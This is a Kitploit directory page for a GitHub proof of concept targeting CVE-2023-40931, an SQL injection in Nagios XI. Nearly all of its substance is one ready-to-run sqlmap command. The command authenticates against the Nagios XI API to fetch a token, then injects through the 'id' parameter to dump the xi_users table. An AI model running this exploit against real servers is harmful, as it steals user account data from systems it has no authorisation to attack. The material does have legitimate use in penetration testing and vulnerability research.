Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-40931-PoC — The sqlmap payload to exploit CVE-2023-40931 | Kitploit
Tools/GitHubGitHub/sealldeveloper/cve-2023-40931-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsealldeveloper/cve-2023-40931-poc

CVE-2023-40931-PoC

The sqlmap payload to exploit CVE-2023-40931

View Repository
12 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-40931

The sqlmap payload to exploit CVE-2023-40931

Payload

Required Information:

  • Valid Username and Password
  • Domain and path of hosted instance
root@kitploit:~
sqlmap -D nagiosxi -T xi_users -u "https://<INSTANCE>/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://<INSTANCE>/nagiosxi/api/v1/authenticate -d "username=<USERNAME>&password=<PASSWORD>&valid_min=1000" | awk -F'"' '{print$12}'`" --dump --level 4 --risk 3 -p id --batch
Download Tool